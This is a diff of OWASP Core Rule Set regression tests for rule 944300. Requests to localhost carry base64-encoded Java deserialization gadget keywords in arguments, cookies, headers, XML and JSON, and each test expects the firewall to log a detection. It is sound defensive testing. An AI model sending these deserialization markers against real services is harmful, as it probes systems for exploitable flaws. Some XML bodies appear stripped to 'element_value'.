"test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 278 desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 279 desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 280 desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 281 desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 282 desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 283 desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 284 desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log: + expect_ids: [944300] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 287 desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 288 desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log: + expect_ids: [944300] + - test_id: 289 desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 290 desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 291 desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 292 desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 293 desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 294 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 295 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log: + expect_ids: [944300] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 298 desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=d2hpbGVjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log: + expect_ids: [944300] + - test_id: 299 desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "d2hpbGVjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log: + expect_ids: [944300] + - test_id: 300 desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=d2hpbGVjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-301 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 301 desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: d2hpbGVjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-302 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 